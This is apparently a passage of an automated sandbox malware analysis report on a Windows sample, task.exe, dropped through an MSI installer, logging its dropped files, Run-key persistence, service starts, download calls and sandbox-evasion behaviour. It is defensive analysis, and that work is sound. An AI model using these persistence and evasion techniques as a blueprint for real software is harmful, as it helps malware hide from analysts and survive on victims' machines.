                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C904201 push ecx; ret 8_2_6C904214
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8B1830 push eax; mov dword ptr [esp], 00000000h8_2_6C8B1831
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8CB0C0 push eax; mov dword ptr [esp], 00000000h8_2_6C8CB0C1
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE68720 push eax; mov dword ptr [esp], 00000007h22_2_6FE68721
                  Source: C:\Users\user\task.exeCode function: 22_2_6FEA4201 push ecx; ret 22_2_6FEA4214
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE51830 push eax; mov dword ptr [esp], 00000000h22_2_6FE51831
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE6B0C0 push eax; mov dword ptr [esp], 00000000h22_2_6FE6B0C1
                  Source: C:\Users\user\task.exeCode function: 22_2_000B3076 push ecx; ret 22_2_000B3089
                  Source: C:\Users\user\task.exeCode function: 22_2_00092826 push ecx; ret 22_2_00092839
                  Source: C:\Users\user\task.exeCode function: 22_2_000B3998 push eax; ret 22_2_000B39B6
                  Source: C:\Users\user\task.exeCode function: 22_2_10002806 push ecx; ret 22_2_10002819
                  Source: C:\Users\user\task.exeCode function: 22_2_02582291 push ecx; ret 22_2_025822A4
                  Source: C:\Users\user\task.exeCode function: 22_2_0255811E push ebx; ret 22_2_0255811F
                  Source: C:\Users\user\task.exeCode function: 22_2_0255C78E pushfd ; retf 22_2_0255C78F
                  Source: C:\Users\user\task.exeCode function: 22_2_025A3403 push eax; ret 22_2_025A3421
                  Source: C:\Users\user\task.exeCode function: 22_2_02572496 push esi; ret 22_2_02572498
                  Source: C:\Users\user\task.exeCode function: 22_2_025A2AE1 push ecx; ret 22_2_025A2AF4
                  Source: C:\Users\user\task.exeCode function: 22_2_025C5C6B push edx; ret 22_2_025C5CDB
                  Source: C:\Users\user\task.exeCode function: 24_2_0044693D push ecx; ret 24_2_0044694D
                  Source: C:\Users\user\task.exeCode function: 24_2_0044DB70 push eax; ret 24_2_0044DB84
                  Source: C:\Users\user\task.exeCode function: 24_2_0044DB70 push eax; ret 24_2_0044DBAC
                  Source: C:\Users\user\task.exeCode function: 24_2_00451D54 push eax; ret 24_2_00451D61
                  Source: C:\Users\user\task.exeCode function: 22_2_00066F61 ShellExecuteW,URLDownloadToFileW,22_2_00066F61
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI509A.tmpJump to dropped file
                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe (copy)Jump to dropped file
                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\67a1ae3c4a36f34f89fd14e4fff5e74c.tmpJump to dropped file
                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\g2m.dll (copy)Jump to dropped file
                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\87377860be1e204a95d069480a67ac12.tmpJump to dropped file
                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\your_package_name.dll (copy)Jump to dropped file
                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\75aedfde5bde214c9f1dda9d9e9a381f.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeFile created: C:\Users\user\task.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeFile created: C:\Users\user\g2m.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeFile created: C:\Users\user\task.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeFile created: C:\Users\user\g2m.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI509A.tmpJump to dropped file

                  Boot Survival

                  barindex
                  Drops PE files to the user root directory
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeFile created: C:\Users\user\task.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeFile created: C:\Users\user\g2m.dllJump to dropped file
                  Source: C:\Users\user\task.exeCode function: 22_2_00078D0C OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,22_2_00078D0C
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run appsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run appsJump to behavior
                  Source: C:\Users\user\task.exeCode function: 22_2_0007AD7F LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,22_2_0007AD7F
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\task.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Delayed program exit found
                  Source: C:\Users\user\task.exeCode function: 22_2_0006E304 Sleep,ExitProcess,22_2_0006E304
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\task.exeAPI/Special instruction interceptor: Address: 7FF90818D044
                  Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF90818D044
                  Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 56FB83A
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: task.exe, 00000016.00000003.1649617657.0000000000874000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMECFF EXPLORER.EXE:
                  Source: task.exe, 00000016.00000003.1652380221.0000000003B31000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649253542.0000000003B31000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652045010.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652977874.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649057788.0000000000869000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1650539674.0000000003F3A000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652572952.0000000002DFB000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649361427.0000000000870000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1651396491.0000000004015000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648863747.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000002.4497721588.0000000004179000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                  Source: task.exe, 00000016.00000003.1652380221.0000000003B31000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649253542.0000000003B31000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652045010.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652977874.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649057788.0000000000869000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1650539674.0000000003F3A000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652572952.0000000002DFB000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649361427.0000000000870000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1651396491.0000000004015000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648863747.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000002.4497721588.0000000004179000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeMemory allocated: 2960000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeMemory allocated: 2BD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeMemory allocated: 2960000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\task.exeCode function: 24_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,24_2_0040DD85
                  Source: C:\Users\user\task.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,22_2_00078A3A
                  Source: C:\Users\user\task.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\task.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\task.exeWindow / User API: threadDelayed 4633Jump to behavior
                  Source: C:\Users\user\task.exeWindow / User API: threadDelayed 5346Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI509A.tmpJump to dropped file
                  Source: C:\Windows\SysWOW64\expand.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\87377860be1e204a95d069480a67ac12.tmpJump to dropped file
                  Source: C:\Windows\SysWOW64\expand.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\your_package_name.dll (copy)Jump to dropped file
                  Source: C:\Windows\SysWOW64\expand.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\75aedfde5bde214c9f1dda9d9e9a381f.tmpJump to dropped file
                  Source: C:\Users\user\task.exe TID: 1080Thread sleep count: 4633 > 30Jump to behavior
                  Source: C:\Users\user\task.exe TID: 1080Thread sleep time: -13899000s >= -30000sJump to behavior
                  Source: C:\Users\user\task.exe TID: 1080Thread sleep count: 5346 > 30Jump to behavior
                  Source: C:\Users\user\task.exe TID: 1080Thread sleep time: -16038000s >= -30000sJump to behavior
                  Source: C:\Users\user\task.exe TID: 5940Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\task.exe TID: 4712Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\expand.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\expand.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8FB0E1 FindFirstFileExW,8_2_6C8FB0E1
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE9B0E1 FindFirstFileExW,22_2_6FE9B0E1
                  Source: C:\Users\user\task.exeCode function: 22_2_0006BF45 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,22_2_0006BF45
                  Source: C:\Users\user\task.exeCode function: 22_2_0006919E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,22_2_0006919E
                  Source: C:\Users\user\task.exeCode function: 22_2_00068290 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,22_2_00068290
                  Source: C:\Users\user\task.exeCode function: 22_2_000672F0 FindFirstFileW,FindNextFileW,22_2_000672F0
                  Source: C:\Users\user\task.exeCode function: 22_2_0007A467 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,22_2_0007A467
                  Source: C:\Users\user\task.exeCode function: 22_2_0006B6E8 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,22_2_0006B6E8
